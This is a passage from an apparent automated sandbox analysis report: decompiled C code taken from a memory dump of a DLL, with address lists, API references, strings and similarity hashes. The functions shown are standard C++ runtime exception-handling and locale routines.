				void* _t134;
				void* _t135;

				_t114 = __ecx;
				E6E1A9DBF(0x6e1eb771, __ebx, __edi, __esi, 0x38);
				_t132 = _t114;
				 *((intOrPtr*)(_t135 - 0x20)) = 1;
				 *((char*)(_t135 - 0x24)) = 0;
				_t134 = _t114 + 0xa8;
				 *(_t135 - 0x1c) = 0;
				_t115 = _t134;
				 *(_t135 - 0x18) = 0;
				if(E6E189048(_t134, _t135 - 0x24) != 0) {
					L13:
					_push(0);
					_t78 = E6E189BAB(0, _t132, _t132, _t134);
				} else {
					 *((char*)(_t135 - 0x24)) = 0x7c;
					 *((intOrPtr*)(_t135 - 0x20)) = 1;
					 *(_t135 - 0x1c) = 0;
					 *(_t135 - 0x18) = 0;
					if(E6E189048(_t115, _t135 - 0x24) != 0) {
						goto L13;
					} else {
						 *((char*)(_t135 - 0x24)) = 0x29;
						 *((intOrPtr*)(_t135 - 0x20)) = 1;
						 *(_t135 - 0x1c) = 0;
						 *(_t135 - 0x18) = 0;
						_t83 = E6E189048(_t115, _t135 - 0x24);
						_t139 = _t83;
						if(_t83 != 0) {
							goto L13;
						} else {
							_push( *(_t135 + 8));
							_t112 = E6E18AECC(0, _t132, _t132, _t134, _t139);
							 *((intOrPtr*)(_t135 - 0x20)) = 1;
							_t118 = _t134;
							 *((char*)(_t135 - 0x24)) = 0;
							 *(_t135 - 0x1c) = 0;
							 *(_t135 - 0x18) = 0;
							_t87 = E6E189048(_t134, _t135 - 0x24);
							if(_t87 != 0) {
								L12:
								_t78 = _t112;
							} else {
								 *(_t135 - 0x1c) =  *(_t135 - 0x1c) & _t87;
								 *(_t135 - 0x18) =  *(_t135 - 0x18) & _t87;
								 *((char*)(_t135 - 0x24)) = 0x7c;
								 *((intOrPtr*)(_t135 - 0x20)) = 1;
								_t89 = E6E189048(_t118, _t135 - 0x24);
								if(_t89 != 0) {
									goto L12;
								} else {
									 *(_t135 - 0x1c) =  *(_t135 - 0x1c) & _t89;
									 *(_t135 - 0x18) =  *(_t135 - 0x18) & _t89;
									 *((char*)(_t135 - 0x24)) = 0x29;
									 *((intOrPtr*)(_t135 - 0x20)) = 1;
									_t91 = E6E189048(_t118, _t135 - 0x24);
									_t142 = _t91;
									if(_t91 != 0) {
										goto L12;
									} else {
										 *((intOrPtr*)(_t135 - 0x14)) = E6E1A9621(_t112, _t132, _t134, _t142, 0x1c);
										 *(_t135 - 4) =  *(_t135 - 4) & 0x00000000;
										_push( *( *(_t135 + 8)) & 0x00000010);
										 *((intOrPtr*)(_t135 - 0x10)) = E6E18AE34(_t112, _t92, _t132, _t134, _t142);
										 *(_t135 - 4) =  *(_t135 - 4) | 0xffffffff;
										E6E185E5E(_t132 + 0x14, _t93);
										_t96 =  *((intOrPtr*)(_t135 - 0x10)) + 4;
										 *((intOrPtr*)(_t135 - 0x14)) =  *((intOrPtr*)(_t135 - 0x10)) + 4;
										E6E185E5E(_t96, _t112);
										 *((intOrPtr*)(_t135 - 0x20)) = 1;
										 *((char*)(_t135 - 0x24)) = 0;
										 *(_t135 - 0x1c) = 0;
										 *(_t135 - 0x18) = 0;
										if(E6E189048(_t134, _t135 - 0x24) == 0) {
											_t113 =  *((intOrPtr*)(_t135 - 0x14));
											while(1) {
												 *(_t135 - 0x2c) =  *(_t135 - 0x2c) & 0x00000000;
												 *(_t135 - 0x28) =  *(_t135 - 0x28) & 0x00000000;
												_t127 = _t134;
												 *((char*)(_t135 - 0x34)) = 0x7c;
												 *((intOrPtr*)(_t135 - 0x30)) = 1;
												_t102 = E6E189048(_t134, _t135 - 0x34);
												if(_t102 != 0) {
													goto L11;
												}
												 *(_t135 - 0x3c) =  *(_t135 - 0x3c) & _t102;
												 *(_t135 - 0x38) =  *(_t135 - 0x38) & _t102;
												 *((char*)(_t135 - 0x44)) = 0x29;
												 *((intOrPtr*)(_t135 - 0x40)) = 1;
												_t104 = E6E189048(_t127, _t135 - 0x44);
												_t145 = _t104;
												if(_t104 == 0) {
													_push( *(_t135 + 8));
													E6E185E5E(_t113, E6E18AECC(_t113, _t132, _t132, _t134, _t145));
													 *((intOrPtr*)(_t135 - 0x20)) = 1;
													 *((char*)(_t135 - 0x24)) = 0;
													 *(_t135 - 0x1c) = 0;
													 *(_t135 - 0x18) = 0;
													if(E6E189048(_t134, _t135 - 0x24) == 0) {
														continue;
													}
												}
												goto L11;
											}
										}
										L11:
										_t78 =  *((intOrPtr*)(_t135 - 0x10));
									}
								}
							}
						}
					}
				}
				return E6E1A9D88(_t78);
			}

0x6e1899c9
0x6e1899d0
0x6e1899d5
0x6e1899d9
0x6e1899e3
0x6e1899e6
0x6e1899ec
0x6e1899f0
0x6e1899f2
0x6e1899fc
0x6e189b9b
0x6e189b9b
0x6e189b9e
0x6e189a02
0x6e189a05
0x6e189a0a
0x6e189a11
0x6e189a14
0x6e189a1e
0x00000000
0x6e189a24
0x6e189a27
0x6e189a2c
0x6e189a33
0x6e189a36
0x6e189a39
0x6e189a3e
0x6e189a40
0x00000000
0x6e189a46
0x6e189a46
0x6e189a50
0x6e189a52
0x6e189a5b
0x6e189a5d
0x6e189a60
0x6e189a63
0x6e189a6a
0x6e189a71
0x6e189b97
0x6e189b97
0x6e189a77
0x6e189a77
0x6e189a7a
0x6e189a81
0x6e189a85
0x6e189a8c
0x6e189a93
0x00000000
0x6e189a99
0x6e189a99
0x6e189a9c
0x6e189aa3
0x6e189aa7
0x6e189aae
0x6e189ab3
0x6e189ab5
0x00000000
0x6e189abb
0x6e189ac3
0x6e189ac6
0x6e189ad2
0x6e189ada
0x6e189add
0x6e189ae5
0x6e189aed
0x6e189af3
0x6e189af6
0x6e189afd
0x6e189b04
0x6e189b09
0x6e189b0c
0x6e189b1a
0x6e189b1c
0x6e189b1f
0x6e189b1f
0x6e189b26
0x6e189b2a
0x6e189b2d
0x6e189b31
0x6e189b38
0x6e189b3f
0x00000000
0x00000000
0x6e189b41
0x6e189b44
0x6e189b4b
0x6e189b4f
0x6e189b56
0x6e189b5b
0x6e189b5d
0x6e189b5f
0x6e189b6c
0x6e189b73
0x6e189b7a
0x6e189b7f
0x6e189b82
0x6e189b90
0x00000000
0x00000000
0x6e189b90
0x00000000
0x6e189b5d
0x6e189b1f
0x6e189b92
0x6e189b92
0x6e189b92
0x6e189ab5
0x6e189a93
0x6e189a71
0x6e189a40
0x6e189a1e
0x6e189ba8

APIs

__EH_prolog3.LIBCMT ref: 6E1899D0

Part of subcall function 6E18AECC: __EH_prolog3.LIBCMT ref: 6E18AED3

Part of subcall function 6E18AE34: __EH_prolog3.LIBCMT ref: 6E18AE3B

Strings

|, xrefs: 6E189B2D
), xrefs: 6E189B4B
), xrefs: 6E189AA3

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3
String ID: )$)$|
API String ID: 431132790-3127124959
Opcode ID: 84d8b7c5596a7b7002646ee47e096b95b8b1d2557d4cdce6e680fe16adba95ca
Instruction ID: 209b861f2dfd74443c1714f9e2a60581ca159fe74db587a341414c05c8c238d2
Opcode Fuzzy Hash: 84d8b7c5596a7b7002646ee47e096b95b8b1d2557d4cdce6e680fe16adba95ca
Instruction Fuzzy Hash: 4C510A71D102099EDF40CFE4C994BEFBAFCAF08309F104969D519F6241E7799A849FA4

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AE935, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E6E1AE935(void* __ecx, void* __edx, void* __fp0, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t147 = __fp0;
				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_push(_t113);
					_t75 = E6E1AE203(_t96, __ecx, __edx, _t113, _t121, __fp0);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E6E1AE203(_t96, __ecx, __edx, 0, _t121, _t147) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E6E1AAA7F(_t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E6E1AA9B1(_t96, _t100, 0, _t121, _t147,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E6E1AE4FF(_t112, _t147, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E6E1C4D58(_t96, _t100, _t110, 0, _t121, _t147);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}

0x6e1ae935
0x6e1ae935
0x6e1ae935
0x6e1ae93c
0x6e1ae945
0x6e1aea64
0x6e1ae94b
0x6e1ae94b
0x6e1ae94c
0x6e1ae94d
0x6e1ae957
0x6e1ae95a
0x6e1ae960
0x6e1ae96a
0x6e1ae98f
0x6e1ae994
0x6e1ae999
0x6e1aea60
0x00000000
0x6e1aea61
0x6e1ae999
0x6e1ae96a
0x6e1ae99f
0x6e1ae9a2
0x6e1ae9a5
0x6e1ae9ab
0x6e1ae9b1
0x6e1ae9c3
0x6e1ae9c8
0x6e1ae9cb
0x6e1ae9ce
0x6e1ae9d1
0x6e1ae9d4
0x6e1ae9da
0x6e1ae9e0
0x6e1ae9e3
0x6e1ae9e6
0x6e1ae9f5
0x6e1ae9f6
0x6e1ae9f6
0x6e1ae9fb
0x6e1aea0e
0x6e1aea10
0x6e1aea15
0x6e1aea20
0x6e1aea22
0x6e1aea24
0x6e1aea40
0x6e1aea45
0x6e1aea48
0x6e1aea48
0x6e1aea20
0x6e1aea15
0x6e1aea4e
0x6e1aea4f
0x6e1aea52
0x6e1aea55
0x6e1aea58
0x6e1aea5b
0x6e1ae9e6
0x00000000
0x6e1ae9da
0x6e1aea65
0x6e1aea6a
0x6e1aea6e
0x6e1aea71
0x6e1aea72
0x6e1aea73
0x6e1aea74
0x6e1aea79
0x6e1aeaf1
0x6e1aeaf3
0x6e1aea7b
0x6e1aea7b
0x6e1aea81
0x00000000
0x6e1aea83
0x6e1aea86
0x6e1aea89
0x6e1aea90
0x6e1aea93
0x6e1aea97
0x6e1aeac9
0x6e1aeacc
0x6e1aead3
0x6e1aead9
0x6e1aeae3
0x6e1aeaec
0x6e1aeaec
0x6e1aeae3
0x6e1aead9
0x6e1aeaed
0x6e1aea99
0x6e1aea99
0x6e1aea99
0x6e1aea9c
0x6e1aea9c
0x6e1aeaa0
0x00000000
0x00000000
0x6e1aeaa4
0x6e1aeab8
0x6e1aeab8
0x6e1aeaa6
0x6e1aeaa6
0x6e1aeaac
0x00000000
0x6e1aeaae
0x6e1aeaae
0x6e1aeab1
0x6e1aeab6
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1aeab6
0x6e1aeaac
0x6e1aeac1
0x6e1aeac3
0x00000000
0x6e1aeac5
0x6e1aeac5
0x6e1aeac5
0x00000000
0x6e1aeac3
0x6e1aeabc
0x6e1aeabe
0x00000000
0x6e1aeabe
0x00000000
0x00000000
0x00000000
0x6e1aea89
0x6e1aea81
0x6e1aeaf4
0x6e1aeaf8
0x6e1aeaf8

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6E1AE95A
CatchIt.LIBVCRUNTIME ref: 6E1AEA40

Strings

RCC, xrefs: 6E1AE974
MOC, xrefs: 6E1AE96C

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: c9b2f4212c473609c250b99c0ee663f3249c7c86a3d25bed3cce69a04cce675a
Instruction ID: 00be2a924f33fe7558eb901c3de62c30956f42ff322a12d2651a45ee112b3833
Opcode Fuzzy Hash: c9b2f4212c473609c250b99c0ee663f3249c7c86a3d25bed3cce69a04cce675a
Instruction Fuzzy Hash: 3B41587690020AAFCF15CFD8CD80AEEBBB5BF48304F248459FA15A6221D3359AD0EB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E19F3D8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6E19F3D8(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t32;
				void* _t34;
				signed int _t38;
				signed int _t39;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t51;
				intOrPtr* _t52;
				intOrPtr _t53;
				signed int _t54;
				void* _t60;
				void* _t65;
				intOrPtr _t68;
				void* _t69;
				void* _t73;
				void* _t79;

				_t73 = __eflags;
				_t60 = __edx;
				_t53 = __ecx;
				E6E1A9DBF(0x6e1ecef4, __ebx, __edi, __esi, 0x30);
				_t50 = _t53;
				 *((intOrPtr*)(_t69 - 0x10)) = _t50;
				_t32 = E6E19294A(_t73, _t69 - 0x3c);
				_t51 = _t50 + 0x2c;
				_t54 = 0xb;
				memcpy(_t51, _t32, _t54 << 2);
				_t34 = E6E1C1229(_t60, _t79);
				_t68 =  *((intOrPtr*)(_t69 - 0x10));
				_t65 = _t34;
				 *((intOrPtr*)(_t69 - 0x10)) = _t68;
				 *((intOrPtr*)(_t68 + 8)) = 0;
				 *((intOrPtr*)(_t68 + 0x10)) = 0;
				 *((intOrPtr*)(_t68 + 0x14)) = 0;
				 *((intOrPtr*)(_t68 + 0x18)) = 0;
				_push(_t51);
				_push(0);
				_push( *((intOrPtr*)(_t65 + 0x1c)));
				 *((intOrPtr*)(_t69 - 4)) = 0;
				 *((intOrPtr*)(_t68 + 8)) = E6E184FEB(_t51, 0, _t60, _t65, _t68, _t73);
				E6E1981B0(_t68, 0, _t65);
				if( *((char*)(_t68 + 0x28)) == 0) {
					_t38 =  *((intOrPtr*)(_t65 + 0x29));
				} else {
					_t38 =  *((intOrPtr*)(_t65 + 0x28));
				}
				_t39 = _t38;
				 *(_t68 + 0x1c) = _t39;
				if(_t39 < 0 || _t39 >= 0x7f) {
					 *(_t68 + 0x1c) =  *(_t68 + 0x1c) & 0x00000000;
				}
				_t52 = _t68 + 0x20;
				E6E1A0472(_t68, _t52,  *((char*)(_t65 + 0x2b)),  *((char*)(_t65 + 0x2a)),  *((char*)(_t65 + 0x2e)));
				_t47 = E6E1A0472(_t68, _t68 + 0x24,  *((char*)(_t65 + 0x2d)),  *((char*)(_t65 + 0x2c)),  *((char*)(_t65 + 0x2f)));
				if( *((char*)(_t69 + 0xc)) != 0) {
					_t47 = 0x76782b24;
					 *_t52 = 0x76782b24;
					 *((intOrPtr*)(_t68 + 0x24)) = 0x76782b24;
				}
				return E6E1A9D88(_t47);
			}

0x6e19f3d8
0x6e19f3d8
0x6e19f3d8
0x6e19f3df
0x6e19f3e4
0x6e19f3e6
0x6e19f3ed
0x6e19f3f2
0x6e19f3f9
0x6e19f3fc
0x6e19f3fe
0x6e19f403
0x6e19f406
0x6e19f40a
0x6e19f40d
0x6e19f410
0x6e19f413
0x6e19f416
0x6e19f419
0x6e19f41a
0x6e19f41b
0x6e19f41e
0x6e19f429
0x6e19f431
0x6e19f43a
0x6e19f441
0x6e19f43c
0x6e19f43c
0x6e19f43c
0x6e19f444
0x6e19f447
0x6e19f44c
0x6e19f453
0x6e19f453
0x6e19f45b
0x6e19f46c
0x6e19f486
0x6e19f48f
0x6e19f491
0x6e19f496
0x6e19f498
0x6e19f498
0x6e19f4a0

APIs

__EH_prolog3.LIBCMT ref: 6E19F3DF

Part of subcall function 6E184FEB: _strlen.LIBCMT ref: 6E184FF1

Part of subcall function 6E1981B0: _Maklocstr.LIBCPMT ref: 6E1981D0
Part of subcall function 6E1981B0: _Maklocstr.LIBCPMT ref: 6E1981ED
Part of subcall function 6E1981B0: _Maklocstr.LIBCPMT ref: 6E19820A

_Mpunct.LIBCPMT ref: 6E19F46C
_Mpunct.LIBCPMT ref: 6E19F486

Strings

$+xv, xrefs: 6E19F491

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Maklocstr$Mpunct$H_prolog3_strlen
String ID: $+xv
API String ID: 1929215243-1686923651
Opcode ID: ec60f2462bd74c586eecc1732590de24e37622ae72a0d48bb996acf618520df9
Instruction ID: 7762cba599378717141c81ca1288b07ae151f9c16d7a46fefb227b686c7ecf9e
Opcode Fuzzy Hash: ec60f2462bd74c586eecc1732590de24e37622ae72a0d48bb996acf618520df9
Instruction Fuzzy Hash: 1121B5B1504B526ED721CFB584907BBBEFCAB0C604B14491AE499C7E41D734DA81EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A7184, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6E1A7184(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t32;
				void* _t34;
				signed int _t38;
				signed int _t39;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t51;
				intOrPtr* _t52;
				intOrPtr _t53;
				signed int _t54;
				void* _t60;
				void* _t65;
				intOrPtr _t68;
				void* _t69;
				void* _t73;
				void* _t79;

				_t73 = __eflags;
				_t60 = __edx;
				_t53 = __ecx;
				E6E1A9DBF(0x6e1ecef4, __ebx, __edi, __esi, 0x30);
				_t50 = _t53;
				 *((intOrPtr*)(_t69 - 0x10)) = _t50;
				_t32 = E6E19294A(_t73, _t69 - 0x3c);
				_t51 = _t50 + 0x2c;
				_t54 = 0xb;
				memcpy(_t51, _t32, _t54 << 2);
				_t34 = E6E1C1229(_t60, _t79);
				_t68 =  *((intOrPtr*)(_t69 - 0x10));
				_t65 = _t34;
				 *((intOrPtr*)(_t69 - 0x10)) = _t68;
				 *((intOrPtr*)(_t68 + 8)) = 0;
				 *((intOrPtr*)(_t68 + 0x10)) = 0;
				 *((intOrPtr*)(_t68 + 0x14)) = 0;
				 *((intOrPtr*)(_t68 + 0x18)) = 0;
				_push(_t51);
				_push(0);
				_push( *((intOrPtr*)(_t65 + 0x1c)));
				 *((intOrPtr*)(_t69 - 4)) = 0;
				 *((intOrPtr*)(_t68 + 8)) = E6E184FEB(_t51, 0, _t60, _t65, _t68, _t73);
				E6E1A5911(_t68, 0, _t65);
				if( *((char*)(_t68 + 0x28)) == 0) {
					_t38 =  *((intOrPtr*)(_t65 + 0x29));
				} else {
					_t38 =  *((intOrPtr*)(_t65 + 0x28));
				}
				_t39 = _t38;
				 *(_t68 + 0x1c) = _t39;
				if(_t39 < 0 || _t39 >= 0x7f) {
					 *(_t68 + 0x1c) =  *(_t68 + 0x1c) & 0x00000000;
				}
				_t52 = _t68 + 0x20;
				E6E1A0472(_t68, _t52,  *((char*)(_t65 + 0x2b)),  *((char*)(_t65 + 0x2a)),  *((char*)(_t65 + 0x2e)));
				_t47 = E6E1A0472(_t68, _t68 + 0x24,  *((char*)(_t65 + 0x2d)),  *((char*)(_t65 + 0x2c)),  *((char*)(_t65 + 0x2f)));
				if( *((char*)(_t69 + 0xc)) != 0) {
					_t47 = 0x76782b24;
					 *_t52 = 0x76782b24;
					 *((intOrPtr*)(_t68 + 0x24)) = 0x76782b24;
				}
				return E6E1A9D88(_t47);
			}

0x6e1a7184
0x6e1a7184
0x6e1a7184
0x6e1a718b
0x6e1a7190
0x6e1a7192
0x6e1a7199
0x6e1a719e
0x6e1a71a5
0x6e1a71a8
0x6e1a71aa
0x6e1a71af
0x6e1a71b2
0x6e1a71b6
0x6e1a71b9
0x6e1a71bc
0x6e1a71bf
0x6e1a71c2
0x6e1a71c5
0x6e1a71c6
0x6e1a71c7
0x6e1a71ca
0x6e1a71d5
0x6e1a71dd
0x6e1a71e6
0x6e1a71ed
0x6e1a71e8
0x6e1a71e8
0x6e1a71e8
0x6e1a71f0
0x6e1a71f3
0x6e1a71f8
0x6e1a71ff
0x6e1a71ff
0x6e1a7207
0x6e1a7218
0x6e1a7232
0x6e1a723b
0x6e1a723d
0x6e1a7242
0x6e1a7244
0x6e1a7244
0x6e1a724c

APIs

__EH_prolog3.LIBCMT ref: 6E1A718B

Part of subcall function 6E184FEB: _strlen.LIBCMT ref: 6E184FF1

_Mpunct.LIBCPMT ref: 6E1A7218
_Mpunct.LIBCPMT ref: 6E1A7232

Strings

$+xv, xrefs: 6E1A723D

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Mpunct$H_prolog3_strlen
String ID: $+xv
API String ID: 23384044-1686923651
Opcode ID: 2ef79026f46cba837519e6fd4054baf8c49b9381412760f566aa142af5d3e276
Instruction ID: ab0e2211fa93b92030320733f6efe4bec671a74c67537443082e05e77e046dd2
Opcode Fuzzy Hash: 2ef79026f46cba837519e6fd4054baf8c49b9381412760f566aa142af5d3e276
Instruction Fuzzy Hash: 342195B5904B926ED721CFB888507BBBEFCBB09614F04091EE599C7A41D734DA81DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1ADC89, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E6E1ADC89(void* __ecx, void* __edi, void* __fp0, intOrPtr* _a4) {
				signed int* _v8;
				signed int _v12;
				signed int _v16;
				void* __esi;
				void* __ebp;
				void* _t19;
				void* _t21;
				signed int _t26;
				void* _t33;
				signed int _t35;
				void* _t38;
				intOrPtr* _t40;
				intOrPtr* _t42;
				intOrPtr _t43;
				signed int* _t44;

				_t52 = __fp0;
				_t34 = __ecx;
				_t42 = _a4;
				_push(__edi);
				_t40 =  *_t42;
				if( *_t40 == 0xe0434352 ||  *_t40 == 0xe0434f4d) {
					_t19 = E6E1AE203(_t33, _t34, _t38, _t40, _t42, _t52);
					__eflags =  *(_t19 + 0x18);
					if( *(_t19 + 0x18) > 0) {
						_t21 = E6E1AE203(_t33, _t34, _t38, _t40, _t42, _t52);
						_t3 = _t21 + 0x18;
						 *_t3 =  *(_t21 + 0x18) - 1;
						__eflags =  *_t3;
					}
				} else {
					if( *_t40 == 0xe06d7363) {
						 *((intOrPtr*)(E6E1AE203(_t33, __ecx, _t38, _t40, _t42, __fp0) + 0x10)) = _t40;
						_t43 =  *((intOrPtr*)(_t42 + 4));
						 *((intOrPtr*)(E6E1AE203(_t33, __ecx, _t38, _t40, _t43, _t52) + 0x14)) = _t43;
						E6E1CEE20(_t33, __ecx, _t38, _t40, __eflags, _t52);
						asm("int3");
						_t44 = _v8;
						 *_t44 =  *_t44 & 0x00000000;
						_t26 =  *(E6E1AE203(_t33, __ecx, _t38, _t40, _t44, _t52, _t43, __ecx, __ecx) + 0x10);
						__eflags = _t26;
						if(_t26 == 0) {
							L12:
							__eflags = 0;
							return 0;
						}
						_t35 =  *(_t26 + 0x1c);
						__eflags = _t35;
						if(_t35 == 0) {
							goto L12;
						}
						__eflags =  *_t35 & 0x00000010;
						if(( *_t35 & 0x00000010) == 0) {
							_t15 =  &_v12;
							 *_t15 = _v12 & 0x00000000;
							__eflags =  *_t15;
							_v16 = _t26;
							 *_t44 = E6E1ADD4B(_t33, _t40, _t44, _t52, 0x6e22096c,  &_v16);
							goto L12;
						}
						return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t26 + 0x18)))) - 4));
					} else {
					}
				}
				return 0;
			}

0x6e1adc89
0x6e1adc89
0x6e1adc8d
0x6e1adc90
0x6e1adc91
0x6e1adc99
0x6e1adcad
0x6e1adcb2
0x6e1adcb6
0x6e1adcb8
0x6e1adcbd
0x6e1adcbd
0x6e1adcbd
0x6e1adcbd
0x6e1adca3
0x6e1adca9
0x6e1adccb
0x6e1adcce
0x6e1adcd6
0x6e1adcd9
0x6e1adcde
0x6e1adce5
0x6e1adce8
0x6e1adcf0
0x6e1adcf3
0x6e1adcf5
0x6e1add26
0x6e1add26
0x00000000
